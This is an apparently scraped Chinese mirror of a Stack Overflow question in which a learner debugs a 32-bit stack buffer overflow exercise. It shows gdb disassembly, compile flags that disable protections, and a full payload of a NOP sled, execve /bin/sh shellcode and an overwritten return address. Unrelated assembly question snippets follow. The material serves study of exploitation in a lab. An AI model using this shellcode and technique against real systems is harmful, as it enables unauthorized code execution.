- html - 出于某种原因,IE8 对我的 Sass 文件中继承的 html5 CSS 不友好?
- JMeter 在响应断言中使用 span 标签的问题
- html - 在 :hover and :active? 上具有不同效果的 CSS 动画
- html - 相对于居中的 html 内容固定的 CSS 重复背景?
我正在学习如何溢出缓冲区。我很难覆盖退货地址。
这是我试图利用的易受攻击的代码:
(gdb) disas main
Dump of assembler code for function main:
0x0804845b <+0>: push ebp
0x0804845c <+1>: mov ebp,esp
0x0804845e <+3>: sub esp,0x100
0x08048464 <+9>: mov eax,DWORD PTR [ebp+0xc]
0x08048467 <+12>: add eax,0x4
0x0804846a <+15>: mov eax,DWORD PTR [eax]
0x0804846c <+17>: push eax
0x0804846d <+18>: call 0x8048340 <strlen@plt>
0x08048472 <+23>: add esp,0x4
0x08048475 <+26>: mov edx,eax
0x08048477 <+28>: mov eax,DWORD PTR [ebp+0xc]
0x0804847a <+31>: add eax,0x4
0x0804847d <+34>: mov eax,DWORD PTR [eax]
0x0804847f <+36>: push edx
0x08048480 <+37>: push eax
0x08048481 <+38>: lea eax,[ebp-0x100]
0x08048487 <+44>: push eax
0x08048488 <+45>: call 0x8048320 <memcpy@plt>
0x0804848d <+50>: add esp,0xc
0x08048490 <+53>: lea eax,[ebp-0x100]
0x08048496 <+59>: push eax
0x08048497 <+60>: call 0x8048310 <printf@plt>
0x0804849c <+65>: add esp,0x4
0x0804849f <+68>: leave
0x080484a0 <+69>: ret
ASLR
.
gcc -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector vuln.c -o vuln
-mpreferred-stack-boundary=2
,因为没有它,反汇编看起来与我遵循的教程非常不同。缓冲区长 256 字节。所以264字节足以覆盖保存的
EIP
,我这样做:
r $(python -c 'print "\x90"*234+"\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"+"\x58\xd0\xff\xff"')
EIP
时堆栈看起来像这样在
main+68
:
(gdb) x/100x $esp
0xffffd058: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd068: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd078: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd088: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd098: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0a8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0b8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0c8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0d8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0e8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd0f8: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd108: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd118: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd128: 0x90909090 0x90909090 0x90909090 0x90909090
0xffffd138: 0x90909090 0x90909090 0xc9319090 0x0bb0e1f7
0xffffd148: 0x515b06eb 0x80cd5b53 0xfffff5e8 0x69622fff
0xffffd158: 0x68732f6e 0xffffd058 0x00000002 0xffffd1f4
0xffffd168: 0xffffd200 0xf7feac7a 0x00000002 0xffffd1f4
0xffffd178: 0xffffd194 0x08049730 0x0804821c 0xf7fb2000
0xffffd188: 0x00000000 0x00000000 0x00000000 0xcad6d58d
0xffffd198: 0xf1c0519d 0x00000000 0x00000000 0x00000000
0xffffd1a8: 0x00000002 0x08048360 0x00000000 0xf7ff04b0
0xffffd1b8: 0xf7e25979 0xf7ffd000 0x00000002 0x08048360
0xffffd1c8: 0x00000000 0x08048381 0x0804845b 0x00000002
0xffffd1d8: 0xffffd1f4 0x080484b0 0x08048520 0xf7feb130
0xFFFFD15C
.后
leave
堆栈看起来像这样:
(gdb) si
0x080484a0 in main ()
(gdb) x/16x $esp
0xffffd15c: 0xffffd058 0x00000002 0xffffd1f4 0xffffd200
0xffffd16c: 0xf7feac7a 0x00000002 0xffffd1f4 0xffffd194
0xffffd17c: 0x08049730 0x0804821c 0xf7fb2000 0x00000000
0xffffd18c: 0x00000000 0x00000000 0xcad6d58d 0xf1c0519d
ret
,应移动地址
0xFFFFD058
进入
EIP
并使用 shellcode 执行 nopslide,但事实并非如此。
(gdb) si
Cannot access memory at address 0x68732f72
(gdb) x/16x $esp
0xffffd160: 0x00000002 0xffffd1f4 0xffffd200 0xf7feac7a
0xffffd170: 0x00000002 0xffffd1f4 0xffffd194 0x08049730
0xffffd180: 0x0804821c 0xf7fb2000 0x00000000 0x00000000
0xffffd190: 0x00000000 0xcad6d58d 0xf1c0519d 0x00000000
(gdb) i r
eax 0x109 265
ecx 0x0 0
edx 0xf7fb3878 -134530952
ebx 0xf7fb2000 -134537216
esp 0xffffd160 0xffffd160
ebp 0x68732f6e 0x68732f6e
esi 0x0 0
edi 0x0 0
eip 0xffffd058 0xffffd058
eflags 0x282 [ SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
最佳答案
这是来自 gdb
的无害警告,这不是程序错误。 eip
正确设置为 0xffffd058
. gdb
可能正在尝试访问帧信息,但由于 ebp
无效,失败。不影响你的程序的执行,你可以像往常一样继续单步执行。
对于程序错误,您会清楚地看到 SIGSEGV
错误信息。
关于assembly - 无法访问地址处的内存,缓冲区溢出尝试,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/31316772/
我被告知“汇编”是您在文件中编写的内容,让您的“汇编程序”将其转换为二进制代码。 但我看到这两个术语在各种作品中混合搭配。我什至听说你编写了“汇编器”,然后“汇编器”使其可执行。 正确的用词是什么?
我在正确终止用 Assembly 编写的 16 位 DOS 程序时遇到问题。这是部分代码: .386P .model flat stack_s segment stack 'stack'
我需要多少档才能正确执行以下指令。我对我所做的事情有些困惑,所以我在这里看到专家的答案。 lw $1,0($2); beq $1,$2,Label; 请注意,检查是否会发生分支将在解码阶段完成。但是在
我正在尝试在汇编中进行简单的乘法运算,但是由于某些原因,当标记了MUL函数时,我看不到寄存器会发生变化。 mov bx, 5 mov cx, 10 mul cx 最佳答案 这些称为指令,它们指定
我正在尝试在 Assembly 中实现递归斐波那契程序。但是,我的程序崩溃了,出现了未处理的异常,我似乎无法找出问题所在。我不怀疑这涉及我对堆栈的不当使用,但我似乎无法指出哪里...... .386
我编写了以下代码: .386 .model small .stack 100h .data text db "Paper",0 .code start : lea dx ,
我有一个用汇编语言编写的裸机 ARM 的启动代码,我正在尝试了解它是如何工作的。该二进制文件被写入一些外部闪存中,并在启动时将其自身的一部分复制到 RAM 中。尽管我读过这篇文章wikipedia e
我在数据部分定义了一个二维数组和两个一维数组(一个用于列总和,一个用于行总和),并且我编写了一个函数,将二维数组求和到一维数组中。我使用 eax 和 ebx 作为二维数组的索引,但是当 eax 或 e
我正在开始组装,我正在使用 nasm 来组装代码,我正在尝试处理驻留在内存中的字符串并更改它,我想检查一个字节是否在某个范围内(ascii),这样我就可以决定如何处理它,我似乎不知道如何检查一个值是否
虽然您通常不希望将一个整体程序集用于小型项目以外的任何事情,但可能会将事物分离得太多。 组装分离过多的迹象/气味是什么? 最佳答案 第一个(明显的)是:在一个有很多项目的解决方案中,其中只有少数(比如
我正在尝试编写斐波那契的汇编代码版本,它给出第 n 个斐波那契数并返回它。 出于某种原因,它在存储斐波那契数的返回值和添加它们时遇到问题。 我希望它打印第 n 个斐波那契数。 我对我的代码做了一些修改
我有一个最小的、可重现的示例有两个问题,该示例具有三个针对 .NET Core 3.1 的项目。但我也想以 .NET Standard 2.0 为目标。 该示例适用于需要在运行时加载程序集并使用提供的
: 运算符在汇编中做什么?代码如下:DS:DX我还没有找到该运算符(operator)的任何文档。(我正在使用 NASM) 最佳答案 那实际上只是一个寄存器分隔符,而不是运算符。这意味着使用 DX 寄
我在哪里可以找到为 gmp-5.0.0 编写的程序的汇编代码我正在使用 UBUNTU 和 G++ 编译器..编译代码的命令是“g++ test.cc -o outp -lgmp” 实际上我想知道在 1
我是组装新手,我有一个关于如何表示负数的问题 我有三个 DWORDS 变量,比如说: result DWORD 0 i DWORD 3 j DWORD 5 我想计算这个公式:result = i -
我想编写我的第一个汇编程序。我在论文上做了一些程序,但这是我第一次使用编译器。我正在使用 ideone .我的程序很简单, 翻译 A = 5 - A到 assembly NEG A ADD A, 5
程序集,masm 嘿,我写了宏来打印存储在 dane1 段中的 1 字节值。 我将值除以 16,然后将提醒推送到堆栈,直到值==0。然后我弹出提醒将它们转换为 ASCII 码,并打印它们。 有人可以看
我正在研究 nasm 的一个大学项目。唯一的问题是我无法生成 162 和 278 之间的偶数随机数。我尝试了很多算法,但似乎无法限制范围内的数字。 是否有一个小技巧或调整来获得所需的范围内的数字?目的
终于在无数次错误的漫长 session 之后,希望这是最后一个。 没有编译或运行时错误,只是一个逻辑错误。 编辑:(固定伪代码) 我的伪代码: first = 1; second = 1; thir
我知道在程序集r0中调用函数时,包含第一个参数,直到r3是第四个。我知道,当它超过四个时,将使用堆栈指针,但是我不太确定具体细节。 r0-r3仍然保持前四个,其余的进入堆栈吗?我正在看下面的程序集,试
我是一名优秀的程序员,十分优秀!